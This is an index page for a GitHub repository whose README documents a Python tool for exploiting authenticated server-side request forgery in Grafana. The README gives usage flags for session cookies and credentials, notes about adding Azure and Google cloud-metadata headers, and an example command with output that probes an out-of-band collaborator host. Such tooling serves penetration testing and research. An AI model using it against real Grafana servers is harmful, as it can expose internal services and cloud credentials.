Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/grafana-ssrf
Authenticated SSRF in Grafana
https://github.com/randomrobbiebf/grafana-ssrf
Last synced: about 12 hours ago
JSON representation
Authenticated SSRF in Grafana
- Host: GitHub
- URL: https://github.com/randomrobbiebf/grafana-ssrf
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2020-05-13T13:43:42.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2024-06-24T19:50:33.000Z (6 months ago)
- Last Synced: 2024-12-16T23:32:21.618Z (8 days ago)
- Language: Python
- Size: 43.9 KB
- Stars: 78
- Watchers: 3
- Forks: 28
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# grafana-ssrf
Authenticated SSRF in Grafana.Notes
---* Azure metadata header has been added to all SSRFS
* Google metadata header has been added to all SSRFS
* SSRF will not follow redirects no matter what so ensure url is direct.
* If login is via SSO or other none grafana logins please grab your session cookie and use the -s flagUsage
---```
usage: grafana-ssrf.py [-h] [-s SESSION] [-u URL] [-H HOST] [-f FILE] [-U USERNAME]
[-P PASSWORD]optional arguments:
-h, --help show this help message and exit
-s SESSION, --session SESSION
Session Cookie Value
-u URL, --url URL URL of host to check will need http or https
-H HOST, --host HOST Host for Grafana
-f FILE, --file FILE File of URLS to check SSRF Against
-U USERNAME, --username USERNAME
Username for Grafana
-P PASSWORD, --password PASSWORD
Password for Grafana
```Example
---```
python3 grafana.py -U admin -P admin -H http://localhost:3000 -u http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net
Refreshed Sources
SSRF Source Updated
Status code: 200
Response body: c7yzzb4zyj5v14wkpi2nxvzjigz
Deleted Old SSRF Source
```Don't forget to check out what jobs we have open!
https://bishopfox.com/jobs#open-positions - Come Join the Fox's!